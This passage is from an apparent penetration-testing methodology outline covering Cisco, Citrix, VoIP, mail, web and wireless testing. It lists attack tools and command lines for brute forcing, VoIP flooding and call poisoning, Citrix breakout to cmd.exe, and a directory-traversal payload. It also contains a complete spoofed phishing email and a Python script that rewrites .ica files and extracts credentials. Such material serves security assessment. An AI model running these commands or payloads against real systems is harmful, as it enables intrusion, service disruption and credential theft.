9.5.1.1.1.  telnet  <IP>

9.5.1.1.2. Sample Banners

9.5.2. SSH

9.5.3. Web Browser

9.5.3.1. Untitled

9.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

9.5.3.1.2. Authentication Required
Enter username and password for "level_15_access" at http://10.1.1.1
User Name:
Password:

9.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

9.5.4. TFTP

9.5.4.1. Untitled

9.5.4.1.1. Untitled

9.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

9.5.4.2. Untitled

9.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

9.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

9.5.4.2.3. Creating backdoors in Cisco IOS using TCL

9.6. Known Bugs.

9.6.1. Attack Tools

9.6.1.1. Untitled

9.6.1.1.1. Untitled

9.6.1.2. Untitled

9.6.1.2.1. Web browse to the Cisco device: http://<IP>

9.6.1.2.2. Untitled

9.6.1.2.3. Untitled

9.6.1.2.4. Untitled

9.6.1.3. Untitled

9.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

9.6.2. Common Vulnerabilities and Exposures (CVE) Information

9.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

9.7. Configuration Files.

9.7.1. Untitled

9.7.1.1. Configuration files explained

9.7.1.1.1. The line that reads "enable password router", where "router" is the password, sets the enable password. It is stored in cleartext, or in the reversible type 7 encoding if service password-encryption is on, and it is superseded by the "enable secret" (stored as a one-way hash) whenever both are configured.

9.7.1.1.2. Untitled

9.7.1.1.3. Untitled

9.7.1.1.4. Password Encryption Utilised

9.7.1.1.5. Untitled

9.7.1.2. Configuration Testing Tools

9.7.1.2.1. Nipper

9.7.1.2.2. fwauto (Beta)

9.8. References.

9.8.1. Cisco IOS Exploitation Techniques

10. Citrix Specific Testing

10.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information, which I have put together, will hopefully help you conduct a vulnerability assessment/penetration test against Citrix.

10.2. Enumeration

10.2.1. web search

10.2.1.1. Google (GHDB)

10.2.1.1.1. ext:ica

10.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

10.2.1.1.3. [WFClient] Password= filetype:ica

10.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

10.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

10.2.1.1.6. inurl:/Citrix/Nfuse17/

10.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

10.2.1.2. Google Hacks (Author Discovered)

10.2.1.2.1. filetype:ica Username=

10.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx

10.2.1.2.3. inurl:/Citrix/AccessPlatform/

10.2.1.2.4. inurl:LogonAgent/Login.asp

10.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp

10.2.1.2.6. inurl:/Citrix/NFuse161/login.asp

10.2.1.2.7. inurl:/Citrix/NFuse16

10.2.1.2.8. inurl:/Citrix/NFuse151/

10.2.1.2.9. allintitle:MetaFrame XP Login

10.2.1.2.10. allintitle:MetaFrame Presentation Server Login

10.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

10.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login

10.2.1.3. Yahoo

10.2.1.3.1. originurlextension:ica

10.2.2. site search

10.2.2.1. Manual

10.2.2.1.1. review web page for useful information

10.2.2.1.2. review source for web page

10.2.3. generic

10.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

10.2.3.2. amap -bqv ip_address port_no.

10.2.4. citrix specific

10.2.4.1. enum.pl

10.2.4.1.1. perl enum.pl ip_address

10.2.4.2. enum.js

10.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address

10.2.4.3. connect.js

10.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application

10.2.4.4. Citrix-pa-scan

10.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

10.2.4.5. pabrute.c

10.2.4.5.1. ./pabrute pubapp list app_list ip_address

10.2.5. Default Ports

10.2.5.1. TCP

10.2.5.1.1. Citrix XML Service

10.2.5.1.2. Advanced Management Console

10.2.5.1.3. Citrix SSL Relay

10.2.5.1.4. ICA sessions

10.2.5.1.5. Server to server

10.2.5.1.6. Management Console to server

10.2.5.1.7. Session Reliability (Auto-reconnect)

10.2.5.1.8. License Management Console

10.2.5.1.9. License server

10.2.5.2. UDP

10.2.5.2.1. Clients to ICA browser service

10.2.5.2.2. Server-to-server

10.2.6. nmap nse scripts

10.2.6.1. citrix-enum-apps

10.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

10.2.6.2. citrix-enum-apps-xml

10.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

10.2.6.3. citrix-enum-servers

10.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>

10.2.6.4. citrix-enum-servers-xml

10.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

10.2.6.5. citrix-brute-xml

10.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

10.3. Scanning

10.3.1. Nessus

10.3.1.1. Plugins

10.3.1.1.1. CGI abuses

10.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

10.3.1.1.3. Misc.

10.3.1.1.4. Service Detection

10.3.1.1.5. Web Servers

10.3.1.1.6. Windows

10.3.2. Nikto

10.3.2.1. perl nikto.pl -host ip_address -port port_no.

10.3.2.1.1. Untitled

10.4. Exploitation

10.4.1. Alter default .ica files

10.4.1.1. InitialProgram=cmd.exe

10.4.1.2. InitialProgram=c:\windows\system32\cmd.exe

10.4.1.3. InitialProgram=explorer.exe
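An .ica launch file is a plain INI file: the [WFClient] Password= dork in 10.2.1 finds files with credentials embedded in them, and the InitialProgram= rewrite above turns a published application into a request for cmd.exe, which a server that permits unpublished executables will honour. The following is an added example, not code from the framework page: it parses a constructed .ica file, lists every credential-bearing key, and rewrites InitialProgram. The server address, application name and the Password= value (Citrix's scrambled form, which is not decoded here) are made up.

```python
"""Read a Citrix .ica launch file for embedded credentials and rewrite InitialProgram.

Added example for 10.4.1 (alter default .ica files) and the [WFClient]
Password= search in 10.2.1; not from the framework page.  The .ica text is
constructed; the Password= value is a made-up scrambled string.
"""
import re

SAMPLE_ICA = """\
[WFClient]
Version=2
ClientName=WI_kiosk01

[ApplicationServers]
Notepad=

[Notepad]
Address=10.10.20.5:1494
InitialProgram=#Notepad
Username=kiosk
Domain=CORP
Password=00114EC8BFB3
TransportDriver=TCP/IP
WinStationDriver=ICA 3.0
"""

CRED_KEYS = {"username", "password", "clearpassword", "domain"}


def parse_ica(text):
    """INI-style parse preserving key case; returns {section: {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            k, v = line.split("=", 1)
            sections[current][k.strip()] = v.strip()
    return sections


def find_credentials(text):
    """Every credential-bearing key, wherever it sits (the dorks look for [WFClient] Password=)."""
    return [(sec, k, v) for sec, kv in parse_ica(text).items()
            for k, v in kv.items() if k.lower() in CRED_KEYS and v]


def set_initial_program(text, program):
    """Point every InitialProgram= at `program` ('#Name' is a published app; a bare path is direct)."""
    pat = re.compile(r"^(\s*InitialProgram\s*=).*$", re.IGNORECASE | re.MULTILINE)
    return pat.subn(lambda m: m.group(1) + program, text)


if __name__ == "__main__":
    print(find_credentials(SAMPLE_ICA))
    rewritten, changed = set_initial_program(SAMPLE_ICA, "cmd.exe")
    print(changed, "line(s) changed")
    print(rewritten)
```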

10.4.2. Enumerate and Connect

10.4.2.1. For applications identified by Citrix-pa-scan

10.4.2.1.1. Pas

10.4.2.2. For published applications with a Citrix client when the master browser is non-public.

10.4.2.2.1. Citrix-pa-proxy

10.4.3. Manual Testing

10.4.3.1. Create Batch File (cmd.bat)

10.4.3.1.1. 1

10.4.3.1.2. 2

10.4.3.2. Host Scripting File (cmd.vbs)

10.4.3.2.1. Option Explicit

10.4.3.2.2. Dim objShell

10.4.3.2.3. Set objShell = CreateObject("WScript.Shell")

10.4.3.2.4. objShell.Run "%comspec% /k"

10.4.3.2.5. WScript.Quit

10.4.3.2.6. alternative functionality

10.4.3.3. iKat

10.4.3.3.1. Integrated Kiosk Attack Tool

10.4.3.4. AT Command - privilege escalation

10.4.3.4.1. AT HH:MM /interactive "cmd.exe"

10.4.3.4.2. AT HH:MM /interactive %comspec% /k

10.4.3.4.3. Untitled

10.4.3.5. Keyboard Shortcuts/ Hotkeys

10.4.3.5.1. Ctrl + h – View History

10.4.3.5.2. Ctrl + n – New Browser

10.4.3.5.3. Shift + Left Click – New Browser

10.4.3.5.4. Ctrl + o – Internet Address (browse feature)

10.4.3.5.5. Ctrl + p – Print (to file)

10.4.3.5.6. Right Click (Shift + F10)

10.4.3.5.7. F1 – Jump to URL

10.4.3.5.8. SHIFT+F1: Local Task List

10.4.3.5.9. SHIFT+F2: Toggle Title Bar

10.4.3.5.10. SHIFT+F3: Close Remote Application

10.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

10.4.3.5.12. CTRL+F2: Remote Task List

10.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

10.4.3.5.14. ALT+F2: Cycle through programs

10.4.3.5.15. ALT+PLUS: Alt+TAB

10.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

10.5. Brute Force

10.5.1. bforce.js

10.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

10.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

10.5.1.3. Untitled

10.6. Review Configuration Files

10.6.1. Application server configuration file

10.6.1.1. appsrv.ini

10.6.1.1.1. Location

10.6.1.1.2. World writeable

10.6.1.1.3. Review other files

10.6.1.1.4. Sample file

10.6.2. Program Neighborhood configuration file

10.6.2.1. pn.ini

10.6.2.1.1. Location

10.6.2.1.2. Review other files

10.6.2.1.3. Sample file

10.6.3. Citrix ICA client configuration file

10.6.3.1. wfclient.ini

10.6.3.1.1. Location

10.6.3.1.2. Sample file

10.7. References

10.7.1. Vulnerabilities

10.7.1.1. Art of Hacking

10.7.1.2. Common Vulnerabilities and Exposures (CVE)

10.7.1.2.1. Untitled

10.7.1.2.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

10.7.1.3. OSVDB

10.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search

10.7.1.4. Secunia

10.7.1.4.1. http://secunia.com/advisories/search/?search=citrix

10.7.1.5. Security-database.com

10.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

10.7.1.6. SecurityFocus

10.7.2. Support

10.7.2.1. Citrix

10.7.2.1.1. Knowledge Base

10.7.2.1.2. Forum

10.7.2.2. Thinworld

10.7.3. Exploits

10.7.3.1. Milw0rm

10.7.3.1.1. http://www.milw0rm.com/search.php

10.7.3.2. Art of Hacking

10.7.3.2.1. Citrix

10.7.4. Tutorials/ Presentations

10.7.4.1. Carnal0wnage

10.7.4.1.1. Carnal0wnage Blog: Citrix Hacking

10.7.4.2. Foundstone

10.7.4.2.1. Got Citrix, Hack IT

10.7.4.3. GNUCitizen

10.7.4.3.1. Hacking CITRIX - the forceful way

10.7.4.3.2. 0day: Hacking secured CITRIX from outside

10.7.4.3.3. CITRIX: Owning the Legitimate Backdoor

10.7.4.3.4. Remote Desktop Command Fixation Attacks

10.7.4.4. Packetstormsecurity

10.7.4.4.1. Hacking Citrix

10.7.4.5. Insomniac Security

10.7.4.5.1. Hacking Citrix

10.7.4.6. Aditya Sood

10.7.4.6.1. Rolling Balls - Can you hack clients

10.7.4.7. BlackHat

10.7.4.7.1. Client Side Security

10.7.5. Tools Resource

10.7.5.1. Zip file containing the majority of the tools mentioned in this article, for easy download/access

11. Network Backbone

11.1. Generic Toolset

11.1.1. Wireshark (Formerly Ethereal)

11.1.1.1. Passive Sniffing

11.1.1.1.1. Usernames/Passwords

11.1.1.1.2. Email

11.1.1.1.3. FTP

11.1.1.1.4. HTTP

11.1.1.1.5. HTTPS

11.1.1.1.6. RDP

11.1.1.1.7. VOIP

11.1.1.1.8. Other

11.1.1.2. Filters

11.1.1.2.1. ip.src == ip_address

11.1.1.2.2. ip.dst == ip_address

11.1.1.2.3. tcp.dstport == port_no.

11.1.1.2.4. ! ip.addr == ip_address

11.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

11.1.2. Cain & Abel

11.1.2.1. Active Sniffing

11.1.2.1.1. ARP Cache Poisoning

11.1.2.1.2. DNS Poisoning

11.1.2.1.3. Routing Protocols

11.1.3. Cisco-Torch

11.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

11.1.4. NTP-Fingerprint

11.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

11.1.5. Yersinia

11.1.6. p0f

11.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

11.1.7. Manual Check (Credentials required)

11.1.8. MAC Spoofing

11.1.8.1. mac address changer for windows

11.1.8.2. macchanger

11.1.8.2.1. Random Mac Address:- macchanger -r eth0

11.1.8.3. madmacs

11.1.8.4. smac

11.1.8.5. TMAC

12. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

12.1. Password Attacks

12.1.1. Known Accounts

12.1.1.1. Identified Passwords

12.1.1.2. Unidentified Hashes

12.1.2. Default Accounts

12.1.2.1. Identified Passwords

12.1.2.2. Unidentified Hashes

12.2. Exploits

12.2.1. Successful Exploits

12.2.1.1. Accounts

12.2.1.1.1. Passwords

12.2.1.1.2. Groups

12.2.1.1.3. Other Details

12.2.1.2. Services

12.2.1.3. Backdoor

12.2.1.4. Connectivity

12.2.2. Unsuccessful Exploits

12.2.3. Resources

12.2.3.1. Securiteam

12.2.3.1.1. Exploits are sorted by year and must be downloaded individually

12.2.3.2. SecurityForest

12.2.3.2.1. Updated via CVS after initial install

12.2.3.3. GovernmentSecurity

12.2.3.3.1. Need to create an account to obtain access

12.2.3.4. Red Base Security

12.2.3.4.1. Oracle Exploit site only

12.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

12.2.3.5.1. Wireless Exploit Site

12.2.3.6. PacketStorm Security

12.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

12.2.3.7. SecWatch

12.2.3.7.1. Exploits sorted by year and month, downloaded separately

12.2.3.8. SecurityFocus

12.2.3.8.1. Exploits must be downloaded individually

12.2.3.9. Metasploit

12.2.3.9.1. Install and regularly update via svn

12.2.3.10. Milw0rm

12.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!

12.3. Tools

12.3.1. Metasploit

12.3.1.1. Free Extra Modules

12.3.1.1.1. local copy

12.3.2. Manual SQL Injection

12.3.2.1. Understanding SQL Injection

12.3.2.2. SQL Injection walkthrough

12.3.2.3. SQL Injection by example

12.3.2.4. Blind SQL Injection

12.3.2.5. Advanced SQL Injection in SQL Server

12.3.2.6. More Advanced SQL Injection

12.3.2.7. Advanced SQL Injection in Oracle databases

12.3.2.8. SQL Cheatsheets

12.3.2.8.1. Untitled

12.3.3. SQL Power Injector

12.3.4. SecurityForest

12.3.5. SPI Dynamics WebInspect

12.3.6. Core Impact

12.3.7. Cisco Global Exploiter

12.3.8. PIXDos

12.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

12.3.9. CANVAS

12.3.10. Inguma

13. Server Specific Tests

13.1. Databases

13.1.1. Direct Access Interrogation

13.1.1.1. MS SQL Server

13.1.1.1.1. Ports

13.1.1.1.2. Version

13.1.1.1.3. osql

13.1.1.2. Oracle

13.1.1.2.1. Ports

13.1.1.2.2. TNS Listener

13.1.1.2.3. SQL Plus

13.1.1.2.4. Default Account/Passwords

13.1.1.2.5. Default SID's

13.1.1.3. MySQL

13.1.1.3.1. Ports

13.1.1.3.2. Version

13.1.1.3.3. Users/Passwords

13.1.1.4. DB2

13.1.1.5. Informix

13.1.1.6. Sybase

13.1.1.7. Other

13.1.2. Scans

13.1.2.1. Default Ports

13.1.2.2. Non-Default Ports

13.1.2.3. Instance Names

13.1.2.4. Versions

13.1.3. Password Attacks

13.1.3.1. Sniffed Passwords

13.1.3.1.1. Cracked Passwords

13.1.3.1.2. Hashes

13.1.3.2. Direct Access Guesses

13.1.4. Vulnerability Assessment

13.1.4.1. Automated

13.1.4.1.1. Reports

13.1.4.1.2. Vulnerabilities

13.1.4.2. Manual

13.1.4.2.1. Patch Levels

13.1.4.2.2. Confirmed Vulnerabilities

13.2. Mail

13.2.1. Scans

13.2.2. Fingerprint

13.2.2.1. Manual

13.2.2.2. Automated

13.2.3. Spoofable

13.2.3.1. Telnet spoof

13.2.3.1.1. telnet target_IP 25
helo target.com
mail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]
X-Originating-Email: [[email protected]]
MIME-Version: 1.0
To: <[email protected]>
From: < [email protected] >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit

Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
Online Security Manager.
Target [email protected]

13.2.4. Relays
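The telnet session in 13.2.3.1.1 is the spoof; the relay question (13.2.4) is answered a step earlier, at RCPT TO: a server that returns 250 for a recipient in a domain it does not host will forward the message for anyone. The following is an added example, not code from the framework page: it drives HELO / MAIL FROM / RCPT TO / QUIT, reads multi-line replies correctly, and classifies the result. So that it runs offline, the other side is a scripted stand-in for a mail server (constructed; not a real MTA) connected over a socketpair; the host and address names are made up, and check_live() is the same dialogue against a real port 25.

```python
"""Open-relay check driven over the same dialogue as the telnet session above.

Added example for 13.2.3/13.2.4; not from the framework page.  The responder
below is a scripted stand-in for a mail server so the exchange runs offline;
the host and address names are made up.
"""
import socket
import threading


def read_reply(f):
    """Return the 3-digit code; multi-line replies use '250-' continuation, '250 ' on the last line."""
    while True:
        line = f.readline().decode(errors="replace").rstrip("\r\n")
        if not line:
            raise ConnectionError("server closed the connection")
        if line[3:4] != "-":
            return int(line[:3])


def smtp_relay_dialogue(sock, helo="scanner.example", mail_from="test@external.example",
                        rcpt_to="victim@another.example"):
    """Walk HELO / MAIL FROM / RCPT TO with an outside sender and recipient; list (command, code)."""
    f = sock.makefile("rb")
    steps = [("<banner>", read_reply(f))]
    for cmd in ("HELO %s" % helo, "MAIL FROM:<%s>" % mail_from, "RCPT TO:<%s>" % rcpt_to):
        sock.sendall((cmd + "\r\n").encode())
        steps.append((cmd, read_reply(f)))
        if steps[-1][1] >= 400:      # rejected: no point continuing
            break
    sock.sendall(b"QUIT\r\n")
    steps.append(("QUIT", read_reply(f)))
    return steps


def is_open_relay(steps):
    """The server relays if it accepts a RCPT TO for a domain it does not host."""
    return any(cmd.startswith("RCPT TO") and code == 250 for cmd, code in steps)


def scripted_mta(sock, relay):
    """Constructed responder: answers like a Postfix-style MTA, open or closed for relaying."""
    f = sock.makefile("rb")
    sock.sendall(b"220 mail.target.example ESMTP\r\n")
    while True:
        line = f.readline()
        if not line:
            break
        cmd = line.decode(errors="replace").strip().upper()
        if cmd.startswith("HELO"):
            sock.sendall(b"250 mail.target.example\r\n")
        elif cmd.startswith("MAIL FROM"):
            sock.sendall(b"250 2.1.0 Ok\r\n")
        elif cmd.startswith("RCPT TO"):
            sock.sendall(b"250 2.1.5 Ok\r\n" if relay else b"554 5.7.1 Relay access denied\r\n")
        elif cmd.startswith("QUIT"):
            sock.sendall(b"221 2.0.0 Bye\r\n")
            break
        else:
            sock.sendall(b"502 5.5.2 Error: command not recognized\r\n")
    sock.close()


def run_offline(relay):
    """Pair the checker with the scripted MTA over a socketpair and return the dialogue."""
    client, server = socket.socketpair()
    t = threading.Thread(target=scripted_mta, args=(server, relay), daemon=True)
    t.start()
    try:
        return smtp_relay_dialogue(client)
    finally:
        client.close()
        t.join(timeout=2)


def check_live(host, port=25, timeout=10):
    """Same dialogue against a real server (not used offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return smtp_relay_dialogue(s)


if __name__ == "__main__":
    for relay in (False, True):
        steps = run_offline(relay)
        print("open relay" if is_open_relay(steps) else "relay denied", steps)
```

Some servers accept RCPT TO and only reject at DATA or after the final dot, so a 250 here is a strong indicator rather than proof; finishing the DATA stage against a mailbox you control settles it.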

13.3. VPN

13.3.1. Scanning

13.3.1.1. 500 UDP IPSEC

13.3.1.2. 1723 TCP PPTP

13.3.1.3. 443 TCP/SSL

13.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

13.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

13.3.2. Fingerprinting

13.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

13.3.3. PSK Crack

13.3.3.1. ikeprobe 80.75.68.27

13.3.3.2. sniff for responses with C&A or ikecrack

13.4. Web

13.4.1. Vulnerability Assessment

13.4.1.1. Automated

13.4.1.1.1. Reports

13.4.1.1.2. Vulnerabilities

13.4.1.2. Manual

13.4.1.2.1. Patch Levels

13.4.1.2.2. Confirmed Vulnerabilities

13.4.2. Permissions

13.4.2.1. PUT /test.txt HTTP/1.0

13.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

13.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6

13.4.3. Scans

13.4.4. Fingerprinting

13.4.4.1. Other

13.4.4.2. HTTP

13.4.4.2.1. Commands

13.4.4.2.2. Modules

13.4.4.2.3. File Extensions

13.4.4.3. HTTPS

13.4.4.3.1. Commands

13.4.4.3.2. Commands

13.4.4.3.3. File Extensions

13.4.5. Directory Traversal

13.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

14. VoIP Security

14.1. Sniffing Tools

14.1.1. AuthTool

14.1.2. Cain & Abel

14.1.3. Etherpeek

14.1.4. NetDude

14.1.5. Oreka

14.1.6. PSIPDump

14.1.7. SIPomatic

14.1.8. SIPv6 Analyzer

14.1.9. UCSniff

14.1.10. VoiPong

14.1.11. VOMIT

14.1.12. Wireshark

14.1.13. WIST - Web Interface for SIP Trace

14.2. Scanning and Enumeration Tools

14.2.1. enumIAX

14.2.2. fping

14.2.3. IAX Enumerator

14.2.4. iWar

14.2.5. Nessus

14.2.6. Nmap

14.2.7. SIP Forum Test Framework (SFTF)

14.2.8. SIPcrack

14.2.9. sipflanker

14.2.9.1. python sipflanker.py 192.168.1-254

14.2.10. SIP-Scan

14.2.11. SIP.Tastic

14.2.12. SIPVicious

14.2.13. SiVuS

14.2.14. SMAP

14.2.14.1. smap IP_Address/Subnet_Mask

14.2.14.2. smap -o IP_Address/Subnet_Mask

14.2.14.3. smap -l IP_Address

14.2.15. snmpwalk

14.2.16. VLANping

14.2.17. VoIPAudit

14.2.18. VoIP GHDB Entries

14.2.19. VoIP Voicemail Database

14.3. Packet Creation and Flooding Tools

14.3.1. H.323 Injection Files

14.3.2. H225regreject

14.3.3. IAXHangup

14.3.4. IAXAuthJack

14.3.5. IAX.Brute

14.3.6. IAXFlooder

14.3.6.1. ./iaxflood sourcename destinationname numpackets

14.3.7. INVITE Flooder

14.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

14.3.8. kphone-ddos

14.3.9. RTP Flooder

14.3.10. rtpbreak

14.3.11. Scapy

14.3.12. Seagull

14.3.13. SIPBomber

14.3.14. SIPNess

14.3.15. SIPp

14.3.16. SIPsak

14.3.16.1. Tracing paths: sipsak -T -s sip:[email protected]

14.3.16.2. Options request: sipsak -vv -s sip:[email protected]

14.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:[email protected]

14.3.17. SIP-Send-Fun

14.3.18. SIPVicious

14.3.19. Spitter

14.3.20. TFTP Brute Force

14.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

14.3.21. UDP Flooder

14.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

14.3.22. UDP Flooder (with VLAN Support)

14.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

14.3.23. Voiphopper

14.4. Fuzzing Tools

14.4.1. Asteroid

14.4.2. Codenomicon VoIP Fuzzers

14.4.3. Fuzzy Packet

14.4.4. Mu Security VoIP Fuzzing Platform

14.4.5. ohrwurm RTP Fuzzer

14.4.6. PROTOS H.323 Fuzzer

14.4.7. PROTOS SIP Fuzzer

14.4.8. SIP Forum Test Framework (SFTF)

14.4.9. Sip-Proxy

14.4.10. Spirent ThreatEx

14.5. Signaling Manipulation Tools

14.5.1. AuthTool

14.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

14.5.2. BYE Teardown

14.5.3. Check Sync Phone Rebooter

14.5.4. RedirectPoison

14.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

14.5.5. Registration Adder

14.5.6. Registration Eraser

14.5.7. Registration Hijacker

14.5.8. SIP-Kill

14.5.9. SIP-Proxy-Kill

14.5.10. SIP-RedirectRTP

14.5.11. SipRogue

14.5.12. vnak

14.6. Media Manipulation Tools

14.6.1. RTP InsertSound

14.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.2. RTP MixSound

14.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.3. RTPProxy

14.6.4. RTPInject

14.7. Generic Software Suites

14.7.1. OAT Office Communication Server Tool Assessment

14.7.2. EnableSecurity VOIPPACK

14.7.2.1. Note: Add-on for Immunity Canvas

14.8. References

14.8.1. URLs

14.8.1.1. Common Vulnerabilities and Exploits (CVE)

14.8.1.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

14.8.1.2. Default Passwords

14.8.1.3. Hacking Exposed VoIP

14.8.1.3.1. Tool Pre-requisites

14.8.1.4. VoIPsa

14.8.2. White Papers

14.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

14.8.2.2. An Analysis of VoIP Security Threats and Tools

14.8.2.3. Hacking VoIP Exposed

14.8.2.4. Security testing of SIP implementations

14.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

14.8.2.6. Two attacks against VoIP

14.8.2.7. VoIP Attacks!

14.8.2.8. VoIP Security Audit Program (VSAP)

15. Wireless Penetration

15.1. Wireless Assessment. The following information should ideally be obtained or enumerated when carrying out a wireless assessment. All of it is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

15.1.1. Site Map

15.1.1.1. RF Map

15.1.1.1.1. Lines of Sight

15.1.1.1.2. Signal Coverage

15.1.1.2. Physical Map

15.1.1.2.1. Triangulate APs

15.1.1.2.2. Satellite Imagery

15.1.2. Network Map

15.1.2.1. MAC Filter

15.1.2.1.1. Authorised MAC Addresses

15.1.2.1.2. Reaction to Spoofed MAC Addresses

15.1.2.2. Encryption Keys utilised

15.1.2.2.1. WEP

15.1.2.2.2. WPA/PSK

15.1.2.2.3. 802.1x

15.1.2.3. Access Points

15.1.2.3.1. ESSID

15.1.2.3.2. BSSIDs

15.1.2.4. Wireless Clients

15.1.2.4.1. MAC Addresses

15.1.2.4.2. Intercepted Traffic

15.2. Wireless Toolkit

15.2.1. Wireless Discovery

15.2.1.1. Aerosol

15.2.1.2. Airfart

15.2.1.3. Aphopper

15.2.1.4. Apradar

15.2.1.5. BAFFLE

15.2.1.6. inSSIDer

15.2.1.7. iWEPPro

15.2.1.8. karma

15.2.1.9. KisMAC-ng

15.2.1.10. Kismet

15.2.1.11. MiniStumbler

15.2.1.12. Netstumbler

15.2.1.13. Vistumbler

15.2.1.14. Wellenreiter

15.2.1.15. Wifi Hopper

15.2.1.16. WirelessMon

15.2.1.17. WiFiFoFum

15.2.2. Packet Capture

15.2.2.1. Airopeek

15.2.2.2. Airpcap

15.2.2.3. Airtraf

15.2.2.4. Apsniff

15.2.2.5. Cain

15.2.2.6. Commview

15.2.2.7. Ettercap

15.2.2.8. Netmon

15.2.2.8.1. nmwifi

15.2.2.9. Wireshark

15.2.3. EAP Attack tools

15.2.3.1. eapmd5pass

15.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

15.2.4. Leap Attack Tools

15.2.4.1. asleap

15.2.4.2. thc leap cracker

15.2.4.3. anwrap

15.2.5. WEP/ WPA Password Attack Tools

15.2.5.1. Airbase

